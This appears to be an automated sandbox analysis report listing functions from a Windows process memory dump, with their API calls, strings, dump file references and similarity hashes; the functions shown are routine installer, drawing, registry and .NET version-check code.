Function 004B8A78, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 174libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 004B8A93
GetModuleHandleW.KERNEL32(advapi32.dll), ref: 004B8AB4
GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 004B8AC1
GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 004B8ACE
GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 004B8ADC
AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,004B8CB3), ref: 004B8B7C
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,004B8CB3), ref: 004B8B85
LocalFree.KERNEL32(?,004B8C60), ref: 004B8C53

Strings

W, xrefs: 004B8B93
advapi32.dll, xrefs: 004B8AAF
GetNamedSecurityInfoW, xrefs: 004B8ABB
SetEntriesInAclW, xrefs: 004B8AD6
SetNamedSecurityInfoW, xrefs: 004B8AC8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateErrorFreeHandleInitializeLastLocalModuleVersion
String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
API String ID: 4088882585-4263478283
Opcode ID: e470e76dbb7141f3320895f6a1926b685bea5dfdd9640bf6a8e56b54529c9f24
Instruction ID: afc200dc3f936ce53cb1efbb79d5f7f4363e73e43a3005e33bf7901514434693
Opcode Fuzzy Hash: e470e76dbb7141f3320895f6a1926b685bea5dfdd9640bf6a8e56b54529c9f24
Instruction Fuzzy Hash: 335130B1901608AFDB10DFA9C845BEEB7F8EB48314F20846AF515E7281DA799D41CF78

Uniqueness

Uniqueness Score: -1.00%

Function 004352F8, Relevance: 22.8, APIs: 15, Instructions: 253windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00435C44: GetDC.USER32(00000000), ref: 00435C9A
Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00435CAF
Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00435CB9
Part of subcall function 00435C44: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,004341AB,00000000,00434237), ref: 00435CDD
Part of subcall function 00435C44: ReleaseDC.USER32 ref: 00435CE8

SelectPalette.GDI32(?,?,000000FF), ref: 0043533B
RealizePalette.GDI32(?), ref: 0043534A
GetDeviceCaps.GDI32(?,0000000C), ref: 0043535C
GetDeviceCaps.GDI32(?,0000000E), ref: 0043536B
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0043539E
SetStretchBltMode.GDI32(?,00000004), ref: 004353AC
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 004353C4
SetStretchBltMode.GDI32(00000000,00000003), ref: 004353E1
CreateCompatibleDC.GDI32(00000000), ref: 00435442
SelectObject.GDI32(?,?), ref: 00435457
SelectObject.GDI32(?,00000000), ref: 004354B6
DeleteDC.GDI32(00000000), ref: 004354C5

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: ebcacab3fa35a37b79342335726d59e6d4aef8331e7f4ab6f0e9e340394c0815
Instruction ID: b5d8e392f58817c240ef4e125c29d8db9c785a17438bdfc93f214cfefec58dac
Opcode Fuzzy Hash: ebcacab3fa35a37b79342335726d59e6d4aef8331e7f4ab6f0e9e340394c0815
Instruction Fuzzy Hash: 5D9128B1A00645AFDB10DFA9C985F5EBBF8AF0C304F14955AF548E7292D678ED00CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0043504C, Relevance: 22.8, APIs: 15, Instructions: 252windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00435C44: GetDC.USER32(00000000), ref: 00435C9A
Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00435CAF
Part of subcall function 00435C44: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00435CB9
Part of subcall function 00435C44: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,004341AB,00000000,00434237), ref: 00435CDD
Part of subcall function 00435C44: ReleaseDC.USER32 ref: 00435CE8

SelectPalette.GDI32(?,?,000000FF), ref: 0043508F
RealizePalette.GDI32(?), ref: 0043509E
GetDeviceCaps.GDI32(?,0000000C), ref: 004350B0
GetDeviceCaps.GDI32(?,0000000E), ref: 004350BF
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 004350F2
SetStretchBltMode.GDI32(?,00000004), ref: 00435100
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00435118
SetStretchBltMode.GDI32(00000000,00000003), ref: 00435135
CreateCompatibleDC.GDI32(00000000), ref: 00435196
SelectObject.GDI32(?,?), ref: 004351AB
SelectObject.GDI32(?,00000000), ref: 0043520A
DeleteDC.GDI32(00000000), ref: 00435219

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: 62c92d5eb5b0f851de4766f09de334abd94ffe329039d1bf9da3c2145fdab174
Instruction ID: 233bef55b0a36d45384dfab345ca70d5732d401be5eec45ae4de51717a1343c1
Opcode Fuzzy Hash: 62c92d5eb5b0f851de4766f09de334abd94ffe329039d1bf9da3c2145fdab174
Instruction Fuzzy Hash: 739119B1600645AFDB10DFADC985F5AB7F8AF0C304F10956AB518EB392D678ED01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0043295C, Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00432973
CreateCompatibleDC.GDI32(00000000), ref: 0043297D
GetObjectW.GDI32(?,00000018,?,00000000,00432AAA,?,00000000,00000000), ref: 0043299D
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 004329B4
GetDC.USER32(00000000), ref: 004329C0
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004329ED
ReleaseDC.USER32 ref: 00432A13
SelectObject.GDI32(?,?), ref: 00432A2E
SelectObject.GDI32(?,00000000), ref: 00432A3D
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00432A69
SelectObject.GDI32(?,00000000), ref: 00432A77
SelectObject.GDI32(?,00000000), ref: 00432A85
DeleteDC.GDI32(?), ref: 00432A9B
DeleteDC.GDI32(?), ref: 00432AA4

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: 67ab257ed31fe3c35b11b87cb29eb0e762719229e517f1d8f41f5d0c193293e7
Instruction ID: 38e763b2fcd98df08a58da3a1b598358b1fd906435b550cf8b27876f91933237
Opcode Fuzzy Hash: 67ab257ed31fe3c35b11b87cb29eb0e762719229e517f1d8f41f5d0c193293e7
Instruction Fuzzy Hash: 2141D171A44245AFDB10EAE5C942FAFB7BCEF4C704F104426B614F7282D6B85D008B64

Uniqueness

Uniqueness Score: -1.00%

Function 00464A68, Relevance: 19.7, APIs: 13, Instructions: 248COMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 00464A9C
GetClientRect.USER32 ref: 00464ABF
GetWindowRect.USER32 ref: 00464AD1
MapWindowPoints.USER32 ref: 00464AE7
ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?,00000000,00464D13), ref: 00464B12
InflateRect.USER32(?,00000000,00000000), ref: 00464B30
GetWindowLongW.USER32(00000000,000000F0), ref: 00464B4A
DrawEdge.USER32(?,?,?,00000008), ref: 00464C4D
IntersectClipRect.GDI32(?,?,?,?,?), ref: 00464C66
GetRgnBox.GDI32(?,?), ref: 00464C9C
MapWindowPoints.USER32 ref: 00464CB2
FillRect.USER32 ref: 00464CEE
ReleaseDC.USER32 ref: 00464D0D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$ClipPoints$ClientDrawEdgeExcludeFillInflateIntersectLongRelease
String ID:
API String ID: 2031318930-0
Opcode ID: 929bc25df9136436eb58daf1e673143fc4020073515f4d91462beb04d9145b3c
Instruction ID: 0155a2863fffdc0196f5b0701a23c8aa15aef842e6437626ca87ec07e7373c89
Opcode Fuzzy Hash: 929bc25df9136436eb58daf1e673143fc4020073515f4d91462beb04d9145b3c
Instruction Fuzzy Hash: FDA14871E00108AFCF00DBA9C885EDEB3F9AF49304F1440AAF555BB292D779AE05DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004AF218, Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 253registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,004AF4B6,?,?,00000003,00000000,00000000,004AF4FA), ref: 004AF335

Part of subcall function 0048087C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004AA95E,00000000,004AA9AF,?,004AAB90), ref: 0048089B

RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,004AF3F4,?,?,00000000,00000000,?,00000000,?,00000000), ref: 004AF3B6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,004AF3F4,?,?,00000000,00000000,?,00000000,?,00000000), ref: 004AF3DD

Strings

Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004AF255
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004AF28E
, xrefs: 004AF2A8
RegOpenKeyEx, xrefs: 004AF2B1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$FormatMessageOpen
String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2812809588-1577016196
Opcode ID: e4d44e2f7e1b1e8a5d05c480ab4d02a178f9ea4212386e9aa6aed049ae57b709
Instruction ID: 8a6419bcb2791a53381d1124d8102056986f61b08075e087aff4c54e65d8dbb1
Opcode Fuzzy Hash: e4d44e2f7e1b1e8a5d05c480ab4d02a178f9ea4212386e9aa6aed049ae57b709
Instruction Fuzzy Hash: FE911171A04209ABDF10DBE5C892BEEB7B9EB59304F10443BF901E7281D7789949CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004B4968, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 162registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004B4B71,?,004B4800,?,00000000,00000000,00000000,?,?,004B4DDC,00000000), ref: 004B4A15
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004B4B71,?,004B4800,?,00000000,00000000,00000000,?,?,004B4DDC,00000000), ref: 004B4A7F
RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,00000001,00000000,00000000,004B4B71,?,004B4800,?,00000000,00000000,00000000,?), ref: 004B4AE6

Strings

v4.0.30319, xrefs: 004B4A07
v2.0.50727, xrefs: 004B4A71
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 004B4A33
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004B4A9A
.NET Framework version %s not found, xrefs: 004B4B1E
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004B49C9
v1.1.4322, xrefs: 004B4AD8
.NET Framework not found, xrefs: 004B4B32

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Close
String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
API String ID: 3535843008-446240816
Opcode ID: d2e10fb5feca6a3f24fcb42a83eb8bc554410f979cd9733810c19072307c41aa
Instruction ID: f881368aafa08851e714dee7e30283df294346eba548115743bb45c6a3e968b3
Opcode Fuzzy Hash: d2e10fb5feca6a3f24fcb42a83eb8bc554410f979cd9733810c19072307c41aa
Instruction Fuzzy Hash: D0512830A441455BEF04DBA5C8A1BFE77B6EB89304F15446BE641A7382DB3CAE05C778

Uniqueness

Uniqueness Score: -1.00%

Function 0040A17C, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61windowregistryCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(MouseZ,Magellan MSWHEEL), ref: 0040A194
RegisterWindowMessageW.USER32(MSWHEEL_ROLLMSG), ref: 0040A1A0
RegisterWindowMessageW.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 0040A1AF
RegisterWindowMessageW.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 0040A1BB
SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0040A1D3
SendMessageW.USER32(00000000,?,00000000,00000000), ref: 0040A1F7

Strings

MSH_WHEELSUPPORT_MSG, xrefs: 0040A1AA
MSWHEEL_ROLLMSG, xrefs: 0040A19B
MSH_SCROLL_LINES_MSG, xrefs: 0040A1B6
Magellan MSWHEEL, xrefs: 0040A18A
MouseZ, xrefs: 0040A18F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Window$Register$Send$Find
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 3569030445-3736581797
Opcode ID: 0fcbb077c07ff9882cc84d3a635bcd3c9e7a428d890ea6953327f829dce1e87a
Instruction ID: de916b79933dc1f45b9434af41ef309634a34aa5b2f0f2deb7c1e5ace83fab2d
Opcode Fuzzy Hash: 0fcbb077c07ff9882cc84d3a635bcd3c9e7a428d890ea6953327f829dce1e87a
Instruction Fuzzy Hash: 2A114C70244302AFE7109F65C882B66B7A8EF85714F20447AB844AB3C2E7B95D50CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004AEE2C, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 238registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FCE8: RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0047FD14

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004AF007,?,00000000,004AF0E1), ref: 004AEF57
RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,?,00000000,00000000,?,00000000,?,00000000,004AF007,?,00000000), ref: 004AF09F

Part of subcall function 0048087C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004AA95E,00000000,004AA9AF,?,004AAB90), ref: 0048089B

Strings

RegCreateKeyEx, xrefs: 004AEEC4
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004AEE71
, xrefs: 004AEEBB
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004AEEA1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateFormatMessageQueryValue
String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2481121983-1280779767
Opcode ID: c99232743b65629e120b1483085dc079c3841bcde47b4e19bb181431503153a2
Instruction ID: f51b78526bea01417bc40a53339b9dfd601407e58267c8bc684484e66f61ddad
Opcode Fuzzy Hash: c99232743b65629e120b1483085dc079c3841bcde47b4e19bb181431503153a2
Instruction Fuzzy Hash: 31910C71E00209AFDB10DFE5C982BEEB7B9EB59304F10402AF615F7281D7799A05CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042DFF4, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042E02D
GetSystemMetrics.USER32 ref: 0042E052
GetSystemMetrics.USER32 ref: 0042E05D
GetClipBox.GDI32(?,?), ref: 0042E06F
GetDCOrgEx.GDI32(?,?), ref: 0042E07C
OffsetRect.USER32(?,?,?), ref: 0042E095
IntersectRect.USER32 ref: 0042E0A6
IntersectRect.USER32 ref: 0042E0BC

Part of subcall function 0042D96C: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042DA08

Strings

EnumDisplayMonitors, xrefs: 0042E00C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: df85d8297e30fa34f0bcdb85626337a3b9893c1de04d62d82588ca40d079c9bb
Instruction ID: 17e93728b5bac92616dfb3de875bf7fe68592ef80e8b2d6e5b976c28df33e635
Opcode Fuzzy Hash: df85d8297e30fa34f0bcdb85626337a3b9893c1de04d62d82588ca40d079c9bb
Instruction Fuzzy Hash: 03311371E00229AFDB10DFA6DC45AEF77BCAB05300F508127F915E3241E7B89D068BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004117B8, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004115CC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00411778), ref: 004115FF
Part of subcall function 004115CC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00411623
Part of subcall function 004115CC: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041163E
Part of subcall function 004115CC: LoadStringW.USER32(00000000,0000FFE8,?,00000100), ref: 004116D9

WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,004118DD), ref: 00411819
WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041184C
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041185E
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00411864
GetStdHandle.KERNEL32(000000F4,004118F8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 00411878
WriteFile.KERNEL32(00000000,000000F4,004118F8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041187E
LoadStringW.USER32(00000000,0000FFE9,?,00000040), ref: 004118A2
MessageBoxW.USER32(00000000,?,?,00002010), ref: 004118BC

Strings

T`P, xrefs: 004117E8
,cP, xrefs: 004117F6

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
